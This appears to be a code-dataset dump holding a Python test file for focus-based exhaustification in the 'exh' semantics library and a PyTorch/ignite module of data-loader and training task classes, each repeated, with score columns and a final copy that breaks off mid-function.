args = parser.parse_args()
runMain(args) | 0.216342 | 0.083965 |
import sys
# insert at 1, 0 is the script path (or '' in REPL)
sys.path.insert(1, '../')
# %%
from exh import *
from exh.exts.focus import *
# %%
"""
# Construction and evaluation
"""
f = Focus(a | b, [b])
assignment = np.array([
[True, True],
[True, False],
[False, True],
[False, False]
])
assert((f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a | b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
assert(not (f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a & b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
# %%
"""
# Alternative calculation
"""
scale = FocusScales()
assert(
scale.alternatives_to([f])
== [b]
)
assert(
scale.alternatives_to([f])
!= [a | b]
)
# %%
"""
# Exhaustification
## Simple cases
"""
# Test if FocusScales is now default (importing the extention should make it default)
assert(any(isinstance(s, FocusScales) for s in Exh(a).e.scales.scales))
# %%
g = Focus(a, alts = [b, c])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
b,
c
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, a & ~b & ~c))
# %%
g = Focus(a | b, alts = [a & b])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
Focus(a, alts=[a & b]),
Focus(b, alts=[a & b]),
a & b
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, (a | b) & ~(a & b)))
# %%
"""
## Exhaustification across operators
"""
apple = Pred(name = "A", depends = ["x"])
cantaloupe = Pred(name = "C", depends = ["x"])
h = Ex > Focus(apple, alts = [cantaloupe])
exhh = Exh(h, scales = FocusScales())
complex_universe = Universe(f = h)
assert(complex_universe.equivalent(
exhh,
(Ex > apple) & ~(Ex > cantaloupe)
))
assert(not complex_universe.equivalent(
exhh,
Ex > apple
))
# %%
"""
Not A
"""
prop_universe = Universe(fs = [a, b, c])
exhf = Exh(~Focus(a, alts = [c]), scales = FocusScales(), subst = False)
assert(exhf.alts == [~Focus(a, alts = [c]), ~c])
assert(prop_universe.equivalent(
exhf,
~a & c
))
# %%
"""
Recursive exh
"""
prej = Focus(a, alts = [c])
fst_exh = Exh(prej, scales = FocusScales())
snd_exh = Exh(fst_exh, scales = FocusScales ())
assert(
fst_exh.alts ==
[prej, c]
)
assert(
snd_exh.alts ==
[Exh(prej), Exh(c)]
)
assert(prop_universe.equivalent(
snd_exh,
a & ~c
))
# %% | tests/focus.py | import sys
# insert at 1, 0 is the script path (or '' in REPL)
sys.path.insert(1, '../')
# %%
from exh import *
from exh.exts.focus import *
# %%
"""
# Construction and evaluation
"""
f = Focus(a | b, [b])
assignment = np.array([
[True, True],
[True, False],
[False, True],
[False, False]
])
assert((f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a | b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
assert(not (f.evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
) ==
(a & b).evaluate_aux(
vm = f.vars(),
assignment = assignment,
variables = {}
)).all()
)
# %%
"""
# Alternative calculation
"""
scale = FocusScales()
assert(
scale.alternatives_to([f])
== [b]
)
assert(
scale.alternatives_to([f])
!= [a | b]
)
# %%
"""
# Exhaustification
## Simple cases
"""
# Test if FocusScales is now default (importing the extention should make it default)
assert(any(isinstance(s, FocusScales) for s in Exh(a).e.scales.scales))
# %%
g = Focus(a, alts = [b, c])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
b,
c
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, a & ~b & ~c))
# %%
g = Focus(a | b, alts = [a & b])
exhg = Exh(g, scales = FocusScales())
assert(
exhg.alts == [
g,
Focus(a, alts=[a & b]),
Focus(b, alts=[a & b]),
a & b
]
)
universe = Universe(f = exhg)
assert(universe.equivalent(exhg, (a | b) & ~(a & b)))
# %%
"""
## Exhaustification across operators
"""
apple = Pred(name = "A", depends = ["x"])
cantaloupe = Pred(name = "C", depends = ["x"])
h = Ex > Focus(apple, alts = [cantaloupe])
exhh = Exh(h, scales = FocusScales())
complex_universe = Universe(f = h)
assert(complex_universe.equivalent(
exhh,
(Ex > apple) & ~(Ex > cantaloupe)
))
assert(not complex_universe.equivalent(
exhh,
Ex > apple
))
# %%
"""
Not A
"""
prop_universe = Universe(fs = [a, b, c])
exhf = Exh(~Focus(a, alts = [c]), scales = FocusScales(), subst = False)
assert(exhf.alts == [~Focus(a, alts = [c]), ~c])
assert(prop_universe.equivalent(
exhf,
~a & c
))
# %%
"""
Recursive exh
"""
prej = Focus(a, alts = [c])
fst_exh = Exh(prej, scales = FocusScales())
snd_exh = Exh(fst_exh, scales = FocusScales ())
assert(
fst_exh.alts ==
[prej, c]
)
assert(
snd_exh.alts ==
[Exh(prej), Exh(c)]
)
assert(prop_universe.equivalent(
snd_exh,
a & ~c
))
# %% | 0.286568 | 0.565839 |
__all__ = [
'DataLoaderTask',
'SimpleDataLoaderTask',
'TrainTask',
'SimpleTrainTask'
]
from abc import abstractmethod
from copy import deepcopy
from logging import Logger
from typing import List, Text, Tuple, Dict, Any
from ..mixin import value
from ..storages.basic import Storage
from ..tasks.containers import Task
from ..typedef import Definition, Profile
from ..typedef import Return
try:
import torch
from torch import nn
from torch import optim
from torch.utils import data
from ignite import engine
from ignite import metrics
from ignite.utils import convert_tensor
except ImportError as ie:
raise RuntimeError('Tasks in module tasker.contrib.torch needs pytorch and pytorch-ignite modules')
class DataLoaderTask(Task):
"""
<i>tasker.contrib.torch.DataLoaderTask</i>
The fundamental task construction to provide data loaders.
Please declare the prefix of data loader in shared storage in reference
field of meta definitions.
Examples:
```toml
# Data loader of validation.
[[__meta__]]
reference = "cifar_loader.CIFARDataLoaderTask:validate"
include = false
path = ""
profile = "validate_loader"
execute = true
# Data Loader of training.
[[__meta__]]
reference = "conv_train.ConvTrainTask:train"
include = false
path = ""
profile = "train"
execute = true
```
"""
def __init__(self, _type: Text = None):
if _type is None:
self.PROVIDE_KEY = 'loader'
else:
self.PROVIDE_KEY = f'{_type}_loader'
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
dataset = self.create_dataset(profile.dataset, shared, logger)
assert isinstance(dataset, data.Dataset)
loader_params = dict(profile.loader)
loader_params['dataset'] = dataset
assert profile.sampler_type in ('sampler', 'batch_sampler', 'none')
if profile.sampler_type != 'none':
loader_params[profile.sampler_type] = self.create_sampler(
dataset, profile.sampler_type == 'batch_sampler', profile.loader,
shared, logger
)
if profile.sampler_type == 'batch_sampler':
if 'batch_size' in loader_params:
loader_params.pop('batch_size')
if 'shuffle' in loader_params:
loader_params.pop('shuffle')
if 'sampler' in loader_params:
loader_params.pop('sampler')
if 'drop_last' in loader_params:
loader_params.pop('drop_last')
shared[self.PROVIDE_KEY] = data.DataLoader(**loader_params)
return Return.SUCCESS.value
def require(self) -> List[Text]:
return []
def provide(self) -> List[Text]:
return [self.PROVIDE_KEY]
def remove(self) -> List[Text]:
return []
@classmethod
def define(cls) -> List[Definition]:
"""
```toml
__schema__ = "tasker.contrib.torch.DataLoaderTask"
sampler_type = ""
[loader]
batch_size = 0
shuffle = true
num_workers = 0
pin_memory = true
drop_last = true
```
"""
return [
value('dataset', list, cls.define_dataset()),
value('loader', list, [
value('batch_size', int),
value('shuffle', bool),
value('num_workers', int),
value('pin_memory', bool),
value('drop_last', bool),
]),
value('sampler_type', str),
value('sampler', list, cls.define_sampler())
]
@abstractmethod
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
"""
The function to create dataset instance with defined profile.
Args:
profile: Runtime profile defined in TOML file of dataset.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new dataset instance.
"""
raise NotImplementedError('Please create the dataset in create_dataset')
@classmethod
@abstractmethod
def define_dataset(cls):
"""
A profile template of dataset need to be implemented by user.
Returns:
Definition of dataset profile.
"""
raise NotImplementedError('Please define the dataset profile in define_dataset')
@abstractmethod
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
"""
The function to create sampler instance with defined profile.
Args:
dataset: The dataset instance need to be loaded.
batch_sampler: Whether to use batch_sampler.
profile: Runtime profile defined in TOML file of sampler or batch sampler.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new sampler or batch sampler instance.
"""
if batch_sampler:
raise NotImplementedError('Please create the batch sampler in create_sampler')
else:
raise NotImplementedError('Please create the sampler in create_sampler')
@classmethod
@abstractmethod
def define_sampler(cls):
raise NotImplementedError('Please define the sampler or batch sampler profile in define_sampler')
class SimpleDataLoaderTask(DataLoaderTask):
"""
<i>tasker.contrib.torch.SimpleDataLoaderTask</i>
An easy to use base class of task for providing data loader. You can
create data loader only with reference of dataset and related profile.
"""
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
dataset_cls = profile.reference
return dataset_cls(**profile.kwargs)
@classmethod
def define_dataset(cls):
return [
value('reference', str),
value('kwargs', list, [])
]
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
return None
@classmethod
def define_sampler(cls):
return []
class TrainTask(Task):
"""
<i>tasker.contrib.torch.TrainTask</i>
The fundamental task construction to train a model by
provided data loaders.
You need to run a task providing two data loaders named
"train_loader" and "validate_loader" in shared storage
before this task as well as the trained model will be
stored into "\\<something\\>_model" or "model" label in shared
storage.
However, many actions should be redefined by user when
implementing `TrainTask`. You can also implement [SimpleTrainTask][tasker.contrib.torch.SimpleTrainTask]
to boost your development.
If you want to store the model with a prefix, please fill the
prefix name into the first parameter when referencing it.
"""
def __init__(self, *args, **kwargs):
if len(args) >= 1:
self.prefix = args[0]
else:
self.prefix = None
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
torch.manual_seed(profile.seed if 'seed' in profile else 0x3a4e)
if 'model' in profile:
device = profile.device if 'device' in profile else 'cpu'
model = self.create_model(profile.model, shared, logger).to(device)
else:
raise RuntimeError('Missing profile field "model" to define the model.')
if 'train_loader' in shared:
train_loader: torch.utils.data.DataLoader = shared['train_loader']
else:
raise RuntimeError('Missing shared object "train_loader" to provide training sets.')
if 'validate_loader' in shared:
validate_loader: torch.utils.data.DataLoader = shared['validate_loader']
else:
raise RuntimeError('Missing shared object "validate_loader" to provide validating sets.')
if 'optimizer' in profile:
optimizer, lr_scheduler = self.create_optimizer(profile.optimizer, shared, logger, model)
else:
raise RuntimeError('Missing profile field "optimizer" to define the optimizer.')
if 'loss_function' in profile:
loss_function = self.create_loss_function(profile.loss_function, shared, logger)
else:
raise RuntimeError('Missing profile field "loss_function" to define the loss function.')
trainer = self.create_trainer(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.train_output_transform if 'train_output_transform' in profile else lambda x, y, y_pred,
loss: loss.item()
)
evaluator = self.create_evaluator(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.evaluate_output_transform if 'evaluate_output_transform' in profile else lambda x, y, y_pred: (
y_pred, y)
)
context = {}
@evaluator.on(engine.Events.COMPLETED)
def display_metrics(_engine: engine.Engine):
logger.info('EVALUATE EPOCH {} | {}'.format(trainer.state.epoch, ' | '.join(map(
lambda it: '{}: {}'.format(it[0], repr(it[1]).replace('\n', ' ')),
_engine.state.metrics.items(),
))))
@evaluator.on(engine.Events.COMPLETED)
def store_model(_engine: engine.Engine):
if 'compare_metric' not in context:
context['compare_metric'] = float('-inf')
if 'compare_by' not in profile or len(profile.compare_by) == 0:
compare_by = 'loss'
sign = '-'
else:
compare_by = profile.compare_by
if compare_by[0] in '+-':
sign = compare_by[0]
compare_by = compare_by[1:]
else:
sign = '+'
if compare_by not in _engine.state.metrics:
logger.warning(f'Not found "{compare_by}" in metrics. Fall back to loss.')
compare_by = 'loss'
sign = '-'
metric_value = _engine.state.metrics[compare_by]
if sign == '-':
metric_value = -metric_value
if metric_value > context['compare_metric']:
context['compare_metric'] = metric_value
shared[self._model_key] = deepcopy(model.eval())
logger.info(f'Stored the model with {compare_by} of {metric_value}.')
@trainer.on(engine.Events.ITERATION_COMPLETED(
every=int(len(train_loader) * (profile.loss_display if 'loss_display' in profile else 0.1))
))
def display_loss(_engine: engine.Engine):
epoch_iteration = _engine.state.iteration % _engine.state.epoch_length
if epoch_iteration == 0:
epoch_iteration = _engine.state.epoch_length
logger.info('TRAIN EPOCH {} ITERATION {} | output: {}'.format(
_engine.state.epoch, epoch_iteration, _engine.state.output
))
@trainer.on(engine.Events.EPOCH_COMPLETED)
def evaluate(_engine: engine.Engine):
evaluator.run(
validate_loader,
)
self.register_handlers(profile, shared, logger, model, trainer, evaluator, context)
trainer.run(
train_loader,
max_epochs=profile.max_epochs if 'max_epochs' in profile else 100,
)
return Return.SUCCESS
@property
def _model_key(self):
return 'model' if self.prefix is None else f'{self.prefix}_model'
def require(self) -> List[Text]:
"""
The task requires 2 items, including "train_loader" and "validate_loader.
Returns:
"train_loader" and "validate_loader"
"""
return [
'train_loader',
'validate_loader',
]
def provide(self) -> List[Text]:
"""
The task provides 1 item, including "model" or "\\<something\\>_model".
Returns:
"model" or "\\<something\\>_model"
"""
return [
self._model_key
]
def remove(self) -> List[Text]:
"""
This task removes nothing.
Returns:
nothing
"""
return []
@classmethod
def define(cls) -> List[Definition]:
"""
Define the schema of `TrainTask`.
Returns:
Schema of `TrainTask`.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
return [
value('model', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('loss_function', list, [
value('reference', str),
value('kwargs', list, [])
]),
value('metrics', list, []),
value('optimizer', list, [
value('reference', str),
value('kwargs', list, []),
value('scheduler', list, [
value('reference', str),
value('kwargs', list)
])
])
]
@abstractmethod
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_model` to build the PyTorch model.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "model" in the task profile.
"""
raise NotImplementedError('Please create the model in create_model')
@abstractmethod
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
Implement `create_loss_function` to build the PyTorch loss function.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "loss_function" in the task profile.
"""
raise NotImplementedError('Please create the loss function in create_loss_function')
@abstractmethod
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module,
**kwargs) -> optim.Optimizer:
"""
Implement `create_optimizer` to build the PyTorch optimizer.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
Always return [SUCCESS][tasker.typedef.Return.SUCCESS].
Notes:
The profile should be attribute "optimizer" in the task profile.
"""
raise NotImplementedError('Please create the optimizer in create_optimizer')
def prepare_train_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when training. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def prepare_validate_batch(
self, profile: Profile, shared: Storage, logger: Logger,
batch: Tuple[torch.Tensor], device: Text, non_blocking: bool = False
):
"""
Preparing batch of samples when validating. Implement this function to
customize.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
batch: Raw batch provided by the data loader.
device: Which device of the batch.
non_blocking: Whether the action of moving the batch is blocking.
Returns:
Prepared batch.
"""
x, y = batch
return (
convert_tensor(x, device=torch.device(device), non_blocking=non_blocking),
convert_tensor(y, device=torch.device(device), non_blocking=non_blocking),
)
def create_trainer(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred, loss: loss.item(),
**kwargs
) -> engine.Engine:
"""
Build the trainer engine. Re-implement this function when you
want to customize the updating actions of training.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The trainer engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
def _update(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.train()
optimizer.zero_grad()
x, y = self.prepare_train_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
loss = loss_function(y_pred, y)
loss.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step(loss)
return output_transform(x, y, y_pred, loss)
trainer = engine.Engine(_update) if not deterministic else engine.DeterministicEngine(_update)
return trainer
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
return _metrics
def register_handlers(self, profile, shared, logger, model, trainer, evaluator, context):
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
trainer: The trainer of the model.
evaluator: The evaluator of the model.
context: The context dictionary to store states in handlers.
Returns:
Nothing.
"""
pass
def create_evaluator(
self, profile: Profile, shared: Storage, logger: Logger,
model: nn.Module, loss_function: nn.Module, optimizer: optim.Optimizer, lr_scheduler: Any,
output_transform=lambda x, y, y_pred: (y_pred, y),
**kwargs
) -> engine.Engine:
"""
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
loss_function: The loss function to train.
optimizer: The optimizer to train.
lr_scheduler: The scheduler to control the learning rate.
output_transform: The action to transform the output of the model.
Returns:
The evaluator engine.
"""
if 'device' in profile:
device_type = profile.device
else:
device_type = 'cpu'
if 'non_blocking' in profile:
non_blocking = profile.non_blocking
else:
non_blocking = False
if 'deterministic' in profile:
deterministic = profile.deterministic
else:
deterministic = False
_metrics = {}
self.register_metrics(profile, shared, logger, _metrics)
def _inference(_engine: engine.Engine, _batch: Tuple[torch.Tensor]):
model.eval()
with torch.no_grad():
x, y = self.prepare_validate_batch(profile, shared, logger, _batch, device=device_type,
non_blocking=non_blocking)
y_pred = model(x)
return output_transform(x, y, y_pred)
evaluator = engine.DeterministicEngine(_inference) if deterministic else engine.Engine(_inference)
for name, metric in _metrics.items():
metric.attach(evaluator, name)
return evaluator
class SimpleTrainTask(TrainTask):
"""
<i>tasker.contrib.torch.SimpleTrainTask</i>
An easy to use base class of task for training model. You can
create model only with reference of dataset and related profile.
Examples:
See Also [Train AlexNet on Place 365 dataset](https://github.com/chenrz925/waterch-tasker/blob/master/examples/place365_alexnet.toml)
"""
def create_model(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the model class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the model profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
model = clz(**kwargs)
return model
def create_loss_function(self, profile: Profile, shared: Storage, logger: Logger, **kwargs) -> nn.Module:
"""
You can build the loss function class implementing [`Module`](https://pytorch.org/docs/stable/generated/torch.nn.Module.html#torch.nn.Module).
And the parameters of the model class can be passed by `kwargs`.
All loss functions provided PyTorch officially can be referenced.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
New model instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, nn.Module):
logger.warning('Referenced class is not a subclass of torch.nn.Module.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the loss_function profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
loss_function = clz(**kwargs)
return loss_function
def create_optimizer(self, profile: Profile, shared: Storage, logger: Logger, model: nn.Module, **kwargs) -> Tuple[
optim.Optimizer, Any]:
"""
You can build the optimizer class implementing [`Optimizer`](https://pytorch.org/docs/stable/optim.html#torch.optim.Optimizer).
And the parameters of the optimizer class can be passed by `kwargs`.
All optimizers provided PyTorch officially can be referenced.
You can also build a learning rate scheduler through `lr_scheduler` field.
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
model: The model to train.
Returns:
New optimizer instance.
"""
if 'reference' in profile:
clz = profile.reference
try:
if not issubclass(clz, optim.Optimizer):
logger.warning('Referenced class is not a subclass of torch.optim.Optimizer.')
except TypeError:
logger.warning('Referenced object is not a class, maybe a function?')
else:
raise RuntimeError('Missing field "reference" in the optimizer profile.')
if 'kwargs' in profile:
kwargs = profile.kwargs
else:
kwargs = {}
optimizer = clz(model.parameters(), **kwargs)
if 'lr_scheduler' in profile:
if 'reference' in profile.lr_scheduler:
lr_scheduler_clz = profile.lr_scheduler.reference
if 'kwargs' in profile.lr_scheduler:
lr_scheduler_kwargs = profile.lr_scheduler.kwargs
else:
lr_scheduler_kwargs = {}
lr_scheduler = lr_scheduler_clz(optimizer, **lr_scheduler_kwargs)
else:
lr_scheduler = None
else:
lr_scheduler = None
return optimizer, lr_scheduler
def register_metrics(
self, profile: Profile, shared: Storage, logger: Logger,
_metrics: Dict
):
"""
Register the metric methods. In `SimpleTrainTask`,
all the metrics can be initialized in profile by
"M" type field.
Examples:
Register accuracy as metric method.
```toml
accuracy = '$M$ignite.metrics.Accuracy'
```
Register F1 macro as metric method.
```toml
f1macro = '1$M$tasker.contrib.torch.FBetaMacro$I'
```
Args:
profile: Runtime profile defined in TOML file.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
_metrics: The metrics dictionary to register.
Returns:
The metrics dictionary.
"""
_metrics['loss'] = metrics.Loss(self.create_loss_function(profile.loss_function, shared, logger))
if 'metrics' in profile:
_metrics.update(profile.metrics)
return _metrics | src/tasker/contrib/torch.py | __all__ = [
'DataLoaderTask',
'SimpleDataLoaderTask',
'TrainTask',
'SimpleTrainTask'
]
from abc import abstractmethod
from copy import deepcopy
from logging import Logger
from typing import List, Text, Tuple, Dict, Any
from ..mixin import value
from ..storages.basic import Storage
from ..tasks.containers import Task
from ..typedef import Definition, Profile
from ..typedef import Return
try:
import torch
from torch import nn
from torch import optim
from torch.utils import data
from ignite import engine
from ignite import metrics
from ignite.utils import convert_tensor
except ImportError as ie:
raise RuntimeError('Tasks in module tasker.contrib.torch needs pytorch and pytorch-ignite modules')
class DataLoaderTask(Task):
"""
<i>tasker.contrib.torch.DataLoaderTask</i>
The fundamental task construction to provide data loaders.
Please declare the prefix of data loader in shared storage in reference
field of meta definitions.
Examples:
```toml
# Data loader of validation.
[[__meta__]]
reference = "cifar_loader.CIFARDataLoaderTask:validate"
include = false
path = ""
profile = "validate_loader"
execute = true
# Data Loader of training.
[[__meta__]]
reference = "conv_train.ConvTrainTask:train"
include = false
path = ""
profile = "train"
execute = true
```
"""
def __init__(self, _type: Text = None):
if _type is None:
self.PROVIDE_KEY = 'loader'
else:
self.PROVIDE_KEY = f'{_type}_loader'
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
dataset = self.create_dataset(profile.dataset, shared, logger)
assert isinstance(dataset, data.Dataset)
loader_params = dict(profile.loader)
loader_params['dataset'] = dataset
assert profile.sampler_type in ('sampler', 'batch_sampler', 'none')
if profile.sampler_type != 'none':
loader_params[profile.sampler_type] = self.create_sampler(
dataset, profile.sampler_type == 'batch_sampler', profile.loader,
shared, logger
)
if profile.sampler_type == 'batch_sampler':
if 'batch_size' in loader_params:
loader_params.pop('batch_size')
if 'shuffle' in loader_params:
loader_params.pop('shuffle')
if 'sampler' in loader_params:
loader_params.pop('sampler')
if 'drop_last' in loader_params:
loader_params.pop('drop_last')
shared[self.PROVIDE_KEY] = data.DataLoader(**loader_params)
return Return.SUCCESS.value
def require(self) -> List[Text]:
return []
def provide(self) -> List[Text]:
return [self.PROVIDE_KEY]
def remove(self) -> List[Text]:
return []
@classmethod
def define(cls) -> List[Definition]:
"""
```toml
__schema__ = "tasker.contrib.torch.DataLoaderTask"
sampler_type = ""
[loader]
batch_size = 0
shuffle = true
num_workers = 0
pin_memory = true
drop_last = true
```
"""
return [
value('dataset', list, cls.define_dataset()),
value('loader', list, [
value('batch_size', int),
value('shuffle', bool),
value('num_workers', int),
value('pin_memory', bool),
value('drop_last', bool),
]),
value('sampler_type', str),
value('sampler', list, cls.define_sampler())
]
@abstractmethod
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
"""
The function to create dataset instance with defined profile.
Args:
profile: Runtime profile defined in TOML file of dataset.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new dataset instance.
"""
raise NotImplementedError('Please create the dataset in create_dataset')
@classmethod
@abstractmethod
def define_dataset(cls):
"""
A profile template of dataset need to be implemented by user.
Returns:
Definition of dataset profile.
"""
raise NotImplementedError('Please define the dataset profile in define_dataset')
@abstractmethod
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
"""
The function to create sampler instance with defined profile.
Args:
dataset: The dataset instance need to be loaded.
batch_sampler: Whether to use batch_sampler.
profile: Runtime profile defined in TOML file of sampler or batch sampler.
shared: Shared storage in the whole lifecycle.
logger: The logger named with this Task.
Returns:
A new sampler or batch sampler instance.
"""
if batch_sampler:
raise NotImplementedError('Please create the batch sampler in create_sampler')
else:
raise NotImplementedError('Please create the sampler in create_sampler')
@classmethod
@abstractmethod
def define_sampler(cls):
raise NotImplementedError('Please define the sampler or batch sampler profile in define_sampler')
class SimpleDataLoaderTask(DataLoaderTask):
"""
<i>tasker.contrib.torch.SimpleDataLoaderTask</i>
An easy to use base class of task for providing data loader. You can
create data loader only with reference of dataset and related profile.
"""
def create_dataset(self, profile: Profile, shared: Storage, logger: Logger) -> data.Dataset:
dataset_cls = profile.reference
return dataset_cls(**profile.kwargs)
@classmethod
def define_dataset(cls):
return [
value('reference', str),
value('kwargs', list, [])
]
def create_sampler(self, dataset: data.Dataset, batch_sampler: bool, profile: Profile, shared: Storage,
logger: Logger):
return None
@classmethod
def define_sampler(cls):
return []
class TrainTask(Task):
"""
<i>tasker.contrib.torch.TrainTask</i>
The fundamental task construction to train a model by
provided data loaders.
You need to run a task providing two data loaders named
"train_loader" and "validate_loader" in shared storage
before this task as well as the trained model will be
stored into "\\<something\\>_model" or "model" label in shared
storage.
However, many actions should be redefined by user when
implementing `TrainTask`. You can also implement [SimpleTrainTask][tasker.contrib.torch.SimpleTrainTask]
to boost your development.
If you want to store the model with a prefix, please fill the
prefix name into the first parameter when referencing it.
"""
def __init__(self, *args, **kwargs):
if len(args) >= 1:
self.prefix = args[0]
else:
self.prefix = None
def invoke(self, profile: Profile, shared: Storage, logger: Logger) -> int:
torch.manual_seed(profile.seed if 'seed' in profile else 0x3a4e)
if 'model' in profile:
device = profile.device if 'device' in profile else 'cpu'
model = self.create_model(profile.model, shared, logger).to(device)
else:
raise RuntimeError('Missing profile field "model" to define the model.')
if 'train_loader' in shared:
train_loader: torch.utils.data.DataLoader = shared['train_loader']
else:
raise RuntimeError('Missing shared object "train_loader" to provide training sets.')
if 'validate_loader' in shared:
validate_loader: torch.utils.data.DataLoader = shared['validate_loader']
else:
raise RuntimeError('Missing shared object "validate_loader" to provide validating sets.')
if 'optimizer' in profile:
optimizer, lr_scheduler = self.create_optimizer(profile.optimizer, shared, logger, model)
else:
raise RuntimeError('Missing profile field "optimizer" to define the optimizer.')
if 'loss_function' in profile:
loss_function = self.create_loss_function(profile.loss_function, shared, logger)
else:
raise RuntimeError('Missing profile field "loss_function" to define the loss function.')
trainer = self.create_trainer(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.train_output_transform if 'train_output_transform' in profile else lambda x, y, y_pred,
loss: loss.item()
)
evaluator = self.create_evaluator(
profile, shared, logger, model, loss_function, optimizer, lr_scheduler,
profile.evaluate_output_transform if 'evaluate_output_transform' in profile else lambda x, y, y_pred: (
y_pred, y)
)
context = {}
@evaluator.on(engine.Events.COMPLETED)
def display_metrics(_engine: engine.Engine):
logger.info('EVALUATE EPOCH {} | {}'.format(trainer.state.epoch, ' | '.join(map(
